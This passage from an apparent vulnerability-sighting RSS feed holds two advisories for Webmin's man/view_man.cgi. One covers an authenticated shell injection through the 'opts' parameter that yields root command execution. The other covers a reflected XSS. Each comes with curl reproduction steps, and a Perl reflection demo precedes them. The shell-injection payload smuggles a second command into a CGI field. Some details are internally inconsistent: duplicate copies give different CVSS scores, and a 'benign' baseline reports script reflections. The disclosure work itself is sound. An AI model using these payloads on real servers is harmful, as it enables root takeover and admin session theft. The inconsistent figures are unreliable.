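    $html =~ s/http:\/\///ig;
    $html =~ s/\?/\?sec=/ig;
    $html =~ s/\+/&opts=$uopts&page=/ig;
    return $html;
}

# Count verbatim occurrences of a needle (\Q..\E applies quotemeta so the needle is literal).
sub count_literal {
    my ($html, $needle) = @_;
    my $n = () = $html =~ /\Q$needle\E/g;
    return $n;
}

my $payload = '<script>alert("VERIFY_TOKEN")</script>';   # the advisory's opts value

for my $case ([raw         => sub { rewrite_links_unsafe(@_) }],
              [html_escape => sub { rewrite_links_safe(@_, \&html_escape_like) }],
              [urlize      => sub { rewrite_links_safe(@_, \&urlize_like) }]) {
    my ($name, $fn) = @$case;
    my $page = $fn->($man2html_html, $payload);
    printf "%-11s script tags reflected: %d\n%s\n", $name, count_literal($page, '<script>'), $page;
}
```

Run with `perl reflect_demo.pl`. The raw chain reflects `<script>` once per rewritten link (two here, five on the real page the advisory measured); both encoded variants reflect none. The urlize form is the better fit for this sink because the value ends up inside a query string within an href attribute: percent-encoding removes tag characters, attribute delimiters and the `&` and `=` that would otherwise let opts inject extra query parameters into the link.
]]>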
    <item>
      <title>54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff</title>
      <link>https://vulnerability.circl.lu/sighting/54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff/export</link>
      <description>{"uuid": "54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/3e6d2720295079f2315f3f87844c68b7", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). 
On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &amp;amp;backquote_command(\"$config{'man2html_path'} -v 2&amp;gt;&amp;amp;1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i &amp;amp;&amp;amp; $1 &amp;gt;= 3) {\n    # New version uses a different syntax!\n    $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&amp;amp;sec=\\\\\\${section}&amp;amp;opts=$in{'opts'}\\\" --bare\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) 
in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html &amp;gt;=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl\n  # Install Webmin 2.641 ...\n  # Install Earl Hood man2html &amp;gt;=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n  # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&amp;amp;pass=ClassB!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] 
\"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **7.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` &amp;gt;=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant on the shell-injection axis (a companion reflected XSS finding in the legacy `man2html` branch of the same file is the corresponding gap on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). 
Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:44.000000Z"}</description>
      <content:encoded>{"uuid": "54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/3e6d2720295079f2315f3f87844c68b7", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). 
On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &amp;amp;backquote_command(\"$config{'man2html_path'} -v 2&amp;gt;&amp;amp;1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i &amp;amp;&amp;amp; $1 &amp;gt;= 3) {\n    # New version uses a different syntax!\n    $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&amp;amp;sec=\\\\\\${section}&amp;amp;opts=$in{'opts'}\\\" --bare\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) 
in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html &amp;gt;=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl\n  # Install Webmin 2.641 ...\n  # Install Earl Hood man2html &amp;gt;=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n  # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&amp;amp;pass=ClassB!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] 
\"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` &amp;gt;=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant on the shell-injection axis (a companion reflected XSS finding in the legacy `man2html` branch of the same file is the corresponding gap on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). 
Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:44.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff/export</guid>
      <pubDate>Sun, 17 May 2026 15:25:44 +0000</pubDate>
    </item>
    <item>
      <title>353ec918-25ea-4db6-b4ef-337aba2b582f</title>
      <link>https://vulnerability.circl.lu/sighting/353ec918-25ea-4db6-b4ef-337aba2b582f/export</link>
      <description>{"uuid": "353ec918-25ea-4db6-b4ef-337aba2b582f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/07d76a066462f1e29cb582adfb9e16cb", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). 
The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n    # Old version of man2html\n    $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n    $out = &amp;amp;backquote_command(\"$cmd 2&amp;gt;&amp;amp;1\", 1);\n    $out =~ s/^.*Content-type:.*\\n//i;\n    $out =~ s/http:\\/\\///ig;\n    $out =~ s/\\?/\\?sec=/ig;\n    $out =~ s/\\+/&amp;amp;opts=$in{'opts'}&amp;amp;page=/ig;   # \u2190 XSS sink: $in{'opts'} interpolated unescaped\n    $out =~ s/.*//isg;\n    ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&amp;amp;opts=$in{'opts'}&amp;amp;page=`. 
Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&amp;amp;show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update &amp;amp;&amp;amp; apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n  # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&amp;amp;pass=AdminPass!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Baseline: count &amp;lt;script&amp;gt; in benign response\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&amp;amp;sec=1&amp;amp;opts=BENIGN\" \\\n  | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5  (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. 
The reflected response body contains the literal string verbatim (5 occurrences), in the form `&amp;amp;opts=alert(\"VERIFY_TOKEN\")&amp;amp;page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `&amp;lt;script&amp;gt;` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&amp;amp;opts=alert(\"VERIFY_TOKEN\")&amp;amp;page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &amp;amp;urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&amp;amp;urlize()` at the link-generation site in 
`man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:46.000000Z"}</description>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/353ec918-25ea-4db6-b4ef-337aba2b582f/export</guid>
      <pubDate>Sun, 17 May 2026 15:25:46 +0000</pubDate>
    </item>
  </channel>
</rss>
